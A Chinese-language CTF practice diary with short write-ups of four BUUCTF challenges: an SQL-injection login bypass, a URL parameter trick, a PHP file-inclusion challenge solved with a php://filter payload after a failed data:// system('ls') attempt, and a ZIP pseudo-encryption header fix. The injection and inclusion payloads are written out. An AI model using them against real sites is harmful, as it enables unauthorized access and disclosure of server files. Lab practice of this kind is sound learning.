22.1.20
状态还不错
0x01 buu web [极客大挑战 2019]EasySQL
- 并没有什么思路。
据说这是php的万能密码。
' or '1'='1
这样就可以登录进来了。
check.php?username=admin' or '1'='1&password=admin' or '1'='1 flag: flag{5778bde8-c891-451d-84c5-e6bdf9505c9c}
0x02 buu web [极客大挑战 2019]Havefun
- 看到一只超可爱的猫猫。
- 好像是纯css的猫诶!
- 源代码审计一下就会看到这个可以改一下猫。
?cat=dog
- 得到flag
flag{21479d1c-b88d-4d64-96fa-1193c36f234d}
0x03 buu web [ACTF2020 新生赛]Include
- 源代码中有个tips.指向flag
尝试
?file=data://text/plain,<?php system("ls")?>
结果显示
hacker!
- 把url转义了一下好像也不行。
- 没有思路了。
- 提到了
PHP伪协议
这个东东。 php://filter/read=convert.base64-encode/resource=XXX.php
可以对文件进行base64编码输出诶。拿到flag之前,不如先把index看一看
<meta charset="utf8"> <?php error_reporting(0); $file = $_GET["file"]; if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){ exit('hacker!'); } if($file){ include($file); }else{ echo '<a href="?file=flag.php">tips</a>'; } ?>
访问
index.php?file=php://filter/read=convert.base64-encode/resource=flag.php
<?php echo "Can you find out the flag?"; //flag{c7746c71-9de7-4048-aead-987bfa89f4be}
0x04 buu misc zip伪加密
- 先引入长篇大论
长篇大论
压缩源文件数据区:
50 4B 03 04:这是头文件标记(0x04034b50)
14 00:解压文件所需 pkware 版本
00 00:全局方式位标记(有无加密)
08 00:压缩方式
5A 7E:最后修改文件时间
F7 46:最后修改文件日期
16 B5 80 14:CRC-32校验(1480B516)
19 00 00 00:压缩后尺寸(25)
17 00 00 00:未压缩尺寸(23)
07 00:文件名长度
00 00:扩展记录长度
压缩源文件目录区:
50 4B 01 02:目录中文件文件头标记(0x02014b50)
3F 00:压缩使用的 pkware 版本
14 00:解压文件所需 pkware 版本
00 00:全局方式位标记(有无加密,这个更改这里进行伪加密,改为09 00打开就会提示有密码了)
08 00:压缩方式
5A 7E:最后修改文件时间
F7 46:最后修改文件日期
16 B5 80 14:CRC-32校验(1480B516)
19 00 00 00:压缩后尺寸(25)
17 00 00 00:未压缩尺寸(23)
07 00:文件名长度
24 00:扩展字段长度
00 00:文件注释长度
00 00:磁盘开始号
00 00:内部文件属性
20 00 00 00:外部文件属性
00 00 00 00:局部头部偏移量
压缩源文件目录结束标志:
50 4B 05 06:目录结束标记
00 00:当前磁盘编号
00 00:目录区开始磁盘编号
01 00:本磁盘上纪录总数
01 00:目录区中纪录总数
59 00 00 00:目录区尺寸大小
3E 00 00 00:目录区对第一张磁盘的偏移量
00 00:ZIP 文件注释长度
试一试能不能这样
09 00
->00 00
好像不行
- 要改压缩文件的源文件区域!
- 得到
flag{Adm1N-B2G-kU-SZIP}
吼鸡
010editor好好用,有钱了买一个